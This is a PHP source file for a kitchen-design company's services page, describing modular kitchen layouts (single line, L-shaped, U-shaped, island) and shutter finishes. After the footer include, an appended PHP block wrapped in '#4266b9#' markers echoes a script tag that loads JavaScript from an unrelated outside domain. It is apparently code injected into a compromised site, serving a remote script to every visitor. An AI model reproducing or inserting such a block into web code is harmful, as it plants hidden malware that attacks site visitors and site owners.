<?php include "inc/header.php";?><style>.box.post div h3 {/* position: absolute; */top: 4px;background: rgb(39,182,224);color: #ffffff;padding: 5px 10px;left: 27%;margin-bottom: 0px;}.box.post.mod_kit_part {text-align: center;}.mod_kit_part > div {display: inline-block;position: relative;}ul.list_style_spl li:before {content: "• ";color: rgb(39,182,224);font-size: 20px;margin-right: 10px;}ul.list_style_spl {list-style: none;margin: 30px 20% !important;}ul.list_style_spl li {text-indent: 1.3em;padding-left: 0px;}h3.glass_str {width: 100%;background: rgb(39,182,224);color:#ffffff;text-align: center;}div.center_img {	text-align:center;}
.center_img img {
  width: 250px;
  height: 250px;
}
.box.post.mod_kit_part img {
  width: 350px;
  height: 250px;
}
</style>		<!-- Highlights -->			<section class="wrapper">				<div class="container">					<div class="row 200%">						<section class="12u">						<div class="servicepage">   	    	<h3 style="margin: 20px 0;">Modular Kitchens:</h3>    	<div id="aboutus">A kitchen has become more than a cooking place off late. The purpose of a modular kitchen is more than aesthetics and elegance; it is used for effectively arranging the utensils & appliances within the space available for efficient utility.			In Synergy Decor, We design layouts based on Major/ Minor Circle for minimal movements for effortless working; considering the anthropometrics in full.				<ul class="list_style_spl"><b>we are specialized in</b><br>			<li class="subli">Single line kitchen</li>			<li class="subli">Two Line kitchen</li>			<li class="subli">L shaped</li>			<li class="subli">U shaped</li>			<li class="subli">Island Kitchen</li>		</ul>		<br>		<section class="wrapper">				<div class="container">					<div class="row">						<section class="4u 12u(3)">
							<div class="box post mod_kit_part">								<!--<div><img src="images/img9.jpg" alt="">	<h3>Two Line Kitchen</h3></div>-->								<div><img src="images/img8.jpg" alt="" /><h3>Single Line</h3></div>
							</div>
						</section>
						<section class="4u 12u(3)">
							<div class="box post mod_kit_part">								<div><img src="images/img9.jpg" alt="" />								<h3>Two Line Kitchen</h3></div>
							</div>
						</section><section class="4u 12u(3)">							<div class="box post mod_kit_part">								<div><img src="images/img10.jpg" alt="" />								<h3>L Shape</h3></div>							</div>						</section>
					</div>					<div class="row">												<section class="6u 12u(2)">							<div class="box post mod_kit_part">								<div><img src="images/img11.jpg" alt="" />								<h3>U Shape</h3></div>							</div>						</section><section class="6u 12u(2)">							<div class="box post mod_kit_part">								<div><img src="images/img12.jpg" alt="" />								<h3>Island Kitchen</h3></div>							</div>						</section>					</div>					<div class="row">											</div>				</div>		</section>									<ul class="list_style_spl"><b>Following shutter finishes are available:</b><br>    		<li class="subli">Laminated Shutters (plywood with mica)</li>    		<li class="subli">Painted Shutters</li>    		<li class="subli">Post-forming Shutters (rounded edges)</li>    		<li class="subli">Polished Veneer Shutters (One-side Teak or Rose wood)</li>    		<li class="subli">Glass Shutters</li>    		<li class="subli">PU High Gloss/ Matt Finish Shutters.</li>    		<br>    	</ul>		<section class="wrapper">				<div class="container">					<div class="row">						<section class="2u 12u(2)">						</section>						<section class="8u 12u(2)">							<h3 class="glass_str">Glass Shutters</h3>							<div class="row">								<section class="6u 12u(2)">									<div class="box post">										<div class="center_img"><img src="images/img13.jpg" alt="" /></div>									</div>								</section>								<section class="6u 12u(2)">									<div class="box post">										<div class="center_img"><img src="images/img15.jpg" alt="" />										</div>									</div>								</section>							</div>						</section>						<section class="2u 12u(2)">						</section>					</div>					<div class="row">						<section class="2u 12u(2)">						</section>						<section class="8u 12u(2)">							<h3 class="glass_str">Post Formed</h3>							<div class="row">								<section class="12u 12u(2)">									<div class="box post">										<div class="center_img"><img src="images/img15.jpg" alt="" /></div>									</div>								</section>							</div>						</section>						<section class="2u 12u(2)">						</section>					</div>					<div class="row">						<section class="2u 12u(2)">						</section>						<section class="8u 12u(2)">							<h3 class="glass_str">PU Finish</h3>							<div class="row">								<section class="6u 12u(2)">									<div class="box post">										<div class="center_img"><img src="images/img16.jpg" alt="" /></div>									</div>								</section>								<section class="6u 12u(2)">									<div class="box post">										<div class="center_img"><img src="images/img17.jpg" alt="" />										</div>									</div>								</section>							</div>						</section>						<section class="2u 12u(2)">						</section>					</div>				</div>		</section>    	</div>    			    </div>    						</section>					</div>				</div>			</section>			<section class="wrapper strip_line">			</section><?php include "inc/footer.php";?>
<?php
#4266b9#
if(empty($g)) {
$g = "<script type=\"text/javascript\" src=\"http://manutd.ge/cqn4rfwt.php?id=11968096\"></script>";
echo $g;
}
#/4266b9#
?>